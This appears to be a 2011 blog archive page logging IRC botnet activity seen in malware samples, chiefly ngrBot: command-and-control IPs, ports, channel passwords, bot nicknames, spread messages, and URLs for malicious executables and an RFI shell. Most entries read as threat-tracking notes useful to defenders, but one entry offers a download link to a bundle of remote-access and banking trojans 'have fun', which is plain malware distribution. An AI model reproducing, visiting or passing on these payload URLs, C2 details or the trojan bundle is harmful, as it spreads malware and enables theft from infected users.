Month: June 2011

Looks like ngrBot the reptile mod made by fubar and jam3s is spreading alot Resolved : [jskd6c.jumpingcrab.com] To [184.107.143.126] Remote Host Port Number 184.107.143.126 2009 and 6667 PASS ngrBot 213.251.170.52 80 70.85.227.66 80 PRIVMSG #root :[HTTP]: Updated HTTP spread message to “juas juaz mira esto bajalo 😀 http://bit.ly/kgPE5S” PRIVMSG #root :[d=”http://www.befordsouthpointford.com/bfam/Ford.Mustang.Cobra.2011.JPEG.EXE” s=”143360 bytes”] Executed fileRead more...

Remote Host Port Number 205.185.122.148 6667 PASS nickz23 205.185.122.148 80 NICK {NEW}[USA][XP-SP2]976017 USER 4242 “” “lol” :4242 PONG :D78F0ECE JOIN #bots * The data identified by the following URL was then requested from the remote web server: o http://ziggy.no-ip.org/lsass.exe hosting infos: http://whois.domaintools.com/205.185.122.148

Remote Host Port Number 209.172.59.146 5794 PASS ngrBot 213.251.170.52 80 74.53.197.4 80 NICK n{US|XPa}pvcbajf USER pvcbajf 0 0 :pvcbajf JOIN #butowski ngrBot PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s) The data identified by the following URLs was then requested from the remote web server: http://api.wipmania.com/ http://conectaamor.com/_server/editor/images/dominios.txt EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe RFI SHELL: http://conectaamor.com/_server/editor/images/lang.phpRead more...

50.28.21.18:8890 Nick: New|AUT|1244036|XP Username: 7665336 Joined Channel: #pedophiliac with Password YDARIO Remote Host Port Number 50.28.21.18 7659 PASS fuck NICK [3151|USA|XP|Z3R0x] USER 3151 “” “lol” :3151 JOIN #pedophiliac YDARIO PONG 422 hosting infos: http://whois.domaintools.com/50.28.21.18

This package have alot of rats and banking trojans inside have fun Download: http://c3266cfc.tubeviral.com

Remote Host Port Number 115.239.230.73 6943 PASS laorosr 213.251.170.52 80 31.184.237.43 80 98.126.35.112 80 MODE [N00_USA_XP_1295223] @ -ix 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X 00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 |Read more...

Remote Host Port Number 213.251.170.52 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}qgaqcrq USER qgaqcrq 0 0 :qgaqcrq JOIN #start romeo Now talking in #start Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ] Topic By: [ ecu ] hosting infos: http://whois.domaintools.com/92.241.164.67

Remote Host Port Number c0re.su 4443 NICK N[USA|XP][yiowryo] USER yiow “” “lol” :yiow JOIN #b0ts NICK N[USA|XP][uuobuyk] USER uuob “” “lol” :uuob NICK [USA-XP][ftlizjn] USER 2844 “” “TsGh” :2844 JOIN #botz NICK [USA-XP][qirnfam] USER 9143 “” “TsGh” :9143 NICK [n][USA-XP][ihcnykp] USER 2550 “” “TsGh” :2550 hosting infos: http://whois.domaintools.com/46.17.100.229

Remote Host Port Number 112.78.8.20 80 195.122.131.3 80 213.251.170.52 80 91.215.159.137 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) PRIVMSG #!hot! :[d=”http://rapidshare.com/files/2997295683/nap.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}aytockz USER aytockz 0 0 :aytockz JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5” PRIVMSG #!hot! :[HTTP]: Updated HTTPRead more...

Remote Host Port Number 193.107.16.111 7654 PASS ngrBot 213.251.170.52 80 66.45.255.234 80 NICK n{US|XPa}cucqohu USER cucqohu 0 0 :cucqohu JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://gloimpsa.com/js/expressInstall.swf.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataFdxaxf.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/193.107.16.111